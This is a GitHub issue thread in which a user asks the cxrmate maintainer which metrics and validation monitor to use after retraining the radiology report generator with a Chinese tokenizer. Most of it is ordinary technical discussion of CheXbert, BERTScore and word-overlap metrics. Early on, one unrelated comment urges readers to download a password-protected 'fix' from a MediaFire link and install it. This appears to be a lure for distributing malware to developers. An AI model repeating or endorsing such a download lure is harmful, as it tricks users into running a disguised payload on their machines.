### ISSUE TITLE
Model migration consultation

### ISSUE THREAD

**Issue by yihp** [aehrc/cxrmate#14]
Hi! Thanks for your contribution. It is an excellent piece of work!

My task language is Chinese. I have trained a Chinese tokenizer and trained it from scratch, but I have the following questions:
Can I still use CheXbert metrics? I am still using monitor: ```val_report_chexbert_f1_macro``` for my training. Should I change to other monitor?

Thank you very much for your time and consideration. I eagerly look forward to your response.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by anicolson** [comment]
Hi @yihp,

Oof, unfortunately, I think you can only use CheXbert in English. Unless you can translate to English before evaluation? But you can certainly change `monitor` to something else.

**Comment by yihp** [comment]
OK, which monitor do you recommend for my Chinese task?

**Comment by yihp** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

What is this? I don't understand.

**Comment by yihp** [comment]
Hi @anicolson ,

I learned from your paper that ```CheXbert, RadGraph ER, and CXR-BERT``` were intended to capture the clinical semantic similarity between the generated and radiologist reports, but these models are for English tasks and I can't reuse them. ```BERTscore``` seems to be able to evaluate Chinese tasks. Then I have the following questions:

1. I can use ```BERTScore``` as the semantic similarity reward, but the results in your paper are not very good, and the effect of CXR-BERT is very good
2. Because CheXbert is only applicable to English tasks, I have to change the ```monitor: 'val_report_chexbert_f1_macro'```, do you have any suggestions for the choice of ```monitor```? BERTscore, CIDEr, ROUGE-L, or BLEU-4?

**Comment by anicolson** [comment]
Hi @yihp,

I am not quite sure to be honest. Maybe you could use a Chinese BERT for BERTScore? You could modify here as such: https://github.com/aehrc/cxrmate/blob/820607a5511b9cb4131b09713c32655e7d9cbb03/tools/metrics/bertscore.py#L84

Here are those options you mentioned for `monitor`:

```
val_report_bertscore_f1
val_report_nlg_bleu_4
val_report_nlg_cider
val_report_nlg_rouge
```

I pushed bertscore to the repo as well.

**Comment by yihp** [comment]
Hi @anicolson ,

Thank you very much for your reply.
You use ```val_report_chexbert_f1_macro``` as ```monitor```. I would like to ask you about the specific process. Are you use the trained cxrmate model to generate radiology reports, then let the chexbert model predict the labels (14 categories), and then calculate the chexbert_f1 value with the actual labels.

Is this the process?

**Comment by anicolson** [comment]
Hi @yihp,

So during validation/testing, the model will generate a report. Then, the generated report and the radiologist report are passed through chexbert (giving the chexbert labels for each). Classification scores are then calculated between the chexbert labels of the generated and radiologist reports.

**Comment by yihp** [comment]
Hi @anicolson ,

OK, I got it. I changed the tokenizer and retrained the model, and the results are as follows:
The question is why test_report_cxr-bert is so high. Is it because cxr-bert has good Chinese generalization ability? I plan to test it.
And because I use ```val_report_chexbert_f1_macro``` as ```monitor```, my task is Chinese, so the ```chexbert_f1``` result is not referenceable. I will replace the ```monitor``` or fine-tune a ```chinese_chexbert``` according to you mentioned.

**Comment by anicolson** [comment]
How do the reports look? E.g., in experiments/.../trial_0/metric_outputs/reports/...

**Comment by yihp** [comment]
> How do the reports look? E.g., in experiments/.../trial_0/metric_outputs/reports/...
> 
> And I was suggesting a Chinese pre-trained Transformer encoder for BERTScore, not CheXbert or CXR-BERT (because I am not sure that they exist for the later two).

The generated reports seem to be fine, but many of the generated reports with different dicom_ids are identical, this indicates that the model's ability to generate reports is relatively poor. Could this be because I use ```val_report_chexbert_f1_macro``` as ```monitor```?

Then I just tested the performance of CXR-BERT in Chinese, and the effect was very poor, which also shows that CXR-BERT is only for English chest X-ray tasks. But I am not sure if there is a similar Chinese BERT model that can calculate similarity.

Because CheXbert is only applicable to English tasks, it is not realistic for me to retrain a CheXbert_chinese. So do you have any suggestions for the choice of ```monitor``` on my Chinese tasks? Is a Chinese pre-trained Transformer encoder for BERTScore a good choice? Or other indicators.

**Comment by yihp** [comment]
Another question is that I don't see any code for calculating BERTScore? There is no BERTScore in the test results, only test_report_cxr-bert.

**Comment by anicolson** [comment]
Please pull the repo, it has been updated

**Comment by yihp** [comment]
> How do the reports look? E.g., in experiments/.../trial_0/metric_outputs/reports/...
> 
> And I was suggesting a Chinese pre-trained Transformer encoder for BERTScore, not CheXbert or CXR-BERT (because I am not sure that they exist for the later two).

Hi @anicolson ,

Thank you very much for your reply.

The generated reports seem to be fine, but many of the generated reports with different dicom_ids are identical, this indicates that the model's ability to generate reports is relatively poor. 

Then I just tested the performance of ```CXR-BERT``` in Chinese, and the effect was very poor, which also shows that ```CXR-BERT``` is only for English chest X-ray tasks. But I am not sure if there is a similar Chinese BERT model that can calculate similarity and will do some test.

In addition, because ```CheXbert``` is only applicable to English tasks, it is not realistic for me to retrain a ```CheXbert``` in chinese language. So do you have any suggestions for the choice of ```monitor``` on my Chinese tasks? Is a Chinese pre-trained Transformer encoder for BERTScore a good choice? Or other indicators.

Looking forward to your reply !

**Comment by anicolson** [comment]
Hi @yihp,

I guess your best starting point would be a non-model based metric, such as a word overlap metric that is language agnostic (I assume these fit into this category, but you will have to double check: val_report_nlg_bleu_4, 
val_report_nlg_cider, val_report_nlg_rouge).

You could use this until you find a Chinese-based model that could be used as a metric perhaps.

**Comment by yihp** [comment]
Hi @anicolson ,

OK, I am doing experimental verification. 

I have a question about ```eval_loss_step```. In the tesorboard training monitoring page, I only see ```train_loss_step```, but no ```eval_loss_step```. How should I add it?
